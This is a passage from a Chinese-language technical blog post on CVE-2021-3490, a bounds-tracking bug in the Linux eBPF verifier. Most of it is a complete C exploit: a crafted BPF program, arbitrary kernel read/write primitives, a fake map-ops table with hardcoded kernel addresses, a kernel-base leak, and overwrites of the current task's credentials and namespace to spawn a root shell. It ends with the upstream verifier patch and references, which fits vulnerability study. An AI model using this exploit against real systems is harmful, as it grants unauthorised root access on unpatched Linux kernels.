0xffffffff), // r8 = 0xffffffffBPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = 0xffffffff00000000BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), // r6 = r6 & r8 = r6 & 0xffffffff00000000 ==> r6 = 0BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // r6 = r6 + 1 = 1BPF_MOV64_IMM(BPF_REG_8, 1), // r8 = 1BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = 0x100000000 = { value = 0x100000000, mask = 0 }BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2), // r8 = 0x100000002 = { value = 0x100000002, maks = 0 }BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), // r6 = 0 | [1, 0]BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0), // r8 = value_buf1[0] = 0BPF_ALU64_IMM(BPF_AND, BPF_REG_8, 1), // r8 = r8 & 1 = 0BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_8), // r6 = r6 + r8 = 0BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // r6 = r6 + 1 = 1BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1), // r6 = r6 & 1 = 1BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // r6 = r6 + 1 = 2BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2), // r6 = r6 & 2 = 2 & 2 = 2BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1), // r6 = r6 >> 1 = 2 >> 1 = 1BPF_LD_MAP_FD(BPF_REG_1, 4), // r1 = [expmap_fd] = bpf_map ptr2BPF_MOV64_IMM(BPF_REG_8, 0), // r8 = 0BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8), // *(uint64_t*)(fp - 8) = r8 = 
0BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fpBPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr2, r2 = fp - 8BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 rightBPF_EXIT_INSN(), // exitBPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 = value_buf2 addrBPF_MOV64_REG(BPF_REG_8, BPF_REG_6),BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000),BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000),BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110), // r6 = r6 * 0x110 = 1 * 0x110 = 0x110BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6), // r7 = r7 - r6 = value_buf2 addr - 0x110BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), // r8 = *(uint64_t*)r7 = value_buf2[-0x110/8] = array_map_opsBPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18), // *(uint64_t*)(r9 +0x18) = value_buf1[3] = r8 = array_map_opsBPF_MOV64_REG(BPF_REG_2, BPF_REG_8), // r2 = r8 = array_map_opsBPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0), // r8 = *(uint64_t*)(r7 +0xc0) = value_buf2[-(0x110-0xc0)/8] = map_addrBPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20), // *(uint64_t*)(r9 +0x20) = value_buf1[4] = r8 = map_addrBPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8), // r8 = *(uint64_t*)(r9 +8) = value_buf1[1] = arb_read addrBPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1), // if arb_read addr == NULL goto pc+1BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40), // *(uint64_t*)(r7 +0x40) = value_buf2[-(0x110-0x40)/8] = btf = r8BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10), // r8 = value_buf1[2] = fake_opsBPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4), // if arb_write flag == 0 goto pc+4BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), // expmap's bpf_map_ops = r8 = fake_opsBPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK), // map_type = BPF_MAP_TYPE_STACKBPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1), // max_entries = -1BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0), 
// spin_lock_off = 0BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),BPF_MOV64_IMM(BPF_REG_0, 0),BPF_EXIT_INSN(),};#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };union bpf_attr attr = {.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,.insns = (uint64_t) &prog,.insn_cnt = sizeof(prog) / sizeof(prog[0]),.license = (uint64_t) "GPL",.log_level = 2,.log_buf = (uint64_t) bpf_log_buf,.log_size = BPF_LOG_SZ,
};void init() {setbuf(stdin, NULL);setbuf(stdout, NULL);setbuf(stderr, NULL);
}void trigger() {char buffer[64];write(sockets[0], buffer, sizeof(buffer));
}void prep() {value1 = (uint64_t*)calloc(0x2000, 1);value2 = (uint64_t*)calloc(0x2000, 1);prctl(PR_SET_NAME, "XiaozaYa");map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);if (map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);if (expmap_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");prog_fd = bpf(BPF_PROG_LOAD, &attr);if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)perror("socketpair()"), err_exit("socketpair()");if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
// puts(bpf_log_buf);
}uint32_t arb_read_4_byte(uint64_t addr) {value1[0] = 0;value1[1] = addr - 0x58;value1[2] = 0;bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);trigger();return bpf_map_get_info_by_fd(expmap_fd);
}uint64_t arb_read(uint64_t addr) {uint64_t lo = arb_read_4_byte(addr);uint64_t hi = arb_read_4_byte(addr+4);return (hi << 32) | lo;
}void prep_arb_write() {uint64_t buf[0x200/8] = { 0 };value1[0] = 0;value1[1] = 0;value1[2] = map_addr+0x110+0x20;uint64_t fake_ops[] = {0x0,0x0,0x0,0x0,0xffffffff81376260,0xffffffff813789d0,0x0,0xffffffff81377290,0xffffffff81376430,0x0,0x0,0xffffffff81344740,0x0,0xffffffff813443b0,0x0,0xffffffff81376710,0xffffffff81377080,0xffffffff813764b0,0xffffffff81376430,0x0,0x0,0x0,0x0,0xffffffff81377a80,0x0,0xffffffff81376cd0,0xffffffff813784b0,0x0,0x0,0x0,0xffffffff81376350,0xffffffff813763b0,0xffffffff81376c00,0x0,0x0,0x0,0x0,0xffffffff81378450,0xffffffff82b0c920,0xffffffff849b6500,0xffffffff82b0d1a0};for (int i = 0; i < sizeof(fake_ops) / 8; i++) {if (fake_ops[i]) fake_ops[i] += koffset;}memcpy(value2, fake_ops, sizeof(fake_ops));bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);trigger();
}void arb_write_4_byte(uint64_t addr, uint32_t val) {value2[0] = val - 1;bpf_map_update_elem(expmap_fd, &key, value2, addr);
}void arb_write(uint64_t addr, uint64_t val) {arb_write_4_byte(addr, val&0xffffffff);arb_write_4_byte(addr+4, (val>>32)&0xffffffff);
}void leak() {uint64_t buf[0x2000/8] = { 0 };value1[0] = 0;value1[1] = 0;value1[2] = 0;bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);trigger();memset(buf, 0, sizeof(buf));bpf_map_lookup_elem(map_fd, &key, buf);
// binary_dump("LEAK DATA", buf, 0x100);if ((buf[3] & 0xffffffff00000fff) == (array_map_ops & 0xffffffff00000fff)) {koffset = buf[3] - array_map_ops;kbase = 0xffffffff81000000 + koffset;map_addr = buf[4] - 0xc0;hexx("koffset", koffset);hexx("kbase", kbase);hexx("map_addr", map_addr);}if (koffset == -1) err_exit("FAILED to leak kernel base");array_map_ops += koffset;init_cred += koffset;init_task += koffset;init_nsproxy += koffset;hexx("init_cred", init_cred);hexx("init_task", init_task);hexx("init_nsproxy", init_nsproxy);current_task = init_task;for (;;) {
// hexx("current_task", current_task);if (arb_read(current_task+0xae8) == tag) {break;}current_task = arb_read(current_task + 0x820) - 0x818;}hexx("current_task", current_task);}int main(int argc, char** argv, char** envp)
{init();prep();leak();prep_arb_write();arb_write_4_byte(current_task+0xad8, init_cred&0xffffffff);arb_write_4_byte(current_task+0xad8+2, (init_cred>>16)&0xffffffff);arb_write_4_byte(current_task+0xad0, init_cred&0xffffffff);arb_write_4_byte(current_task+0xad0+2, (init_cred>>16)&0xffffffff);arb_write_4_byte(current_task+0xb40, init_nsproxy&0xffffffff);arb_write_4_byte(current_task+0xb40+2, (init_nsproxy>>16)&0xffffffff);get_root_shell();puts("EXP NERVER END!");return 0;
}
效果如下:
漏洞修复
patch
如下:
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 757476c91c984..9352a1b7de2dd 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -7084,11 +7084,10 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
 	s32 smin_val = src_reg->s32_min_value;
 	u32 umax_val = src_reg->u32_max_value;
 
-	/* Assuming scalar64_min_max_and will be called so its safe
-	 * to skip updating register for known 32-bit case.
-	 */
-	if (src_known && dst_known)
+	if (src_known && dst_known) {
+		__mark_reg32_known(dst_reg, var32_off.value);
 		return;
+	}
 
 	/* We get our minimum from the var_off, since that's inherently
 	 * bitwise. Our maximum is the minimum of the operands' maxima.
@@ -7108,7 +7107,6 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
 		dst_reg->s32_min_value = dst_reg->u32_min_value;
 		dst_reg->s32_max_value = dst_reg->u32_max_value;
 	}
-
 }
其中 __mark_reg32_known 函数如下:
static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{reg->var_off = tnum_const_subreg(reg->var_off, imm);reg->s32_min_value = (s32)imm;reg->s32_max_value = (s32)imm;reg->u32_min_value = (u32)imm;reg->u32_max_value = (u32)imm;
}
即在寄存器的低 32 位已知时,及时更新 32 位范围。
参考
【kernel exploit】CVE-2021-3490 eBPF 32位边界计算错误漏洞
【CVE.0x0A】CVE-2021-3490 漏洞复现及简要分析
这篇关于CVE-2021-3490:ebpf verifier 寄存器32位范围更新错误导致越界读写【ALU Sanitation 绕过】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!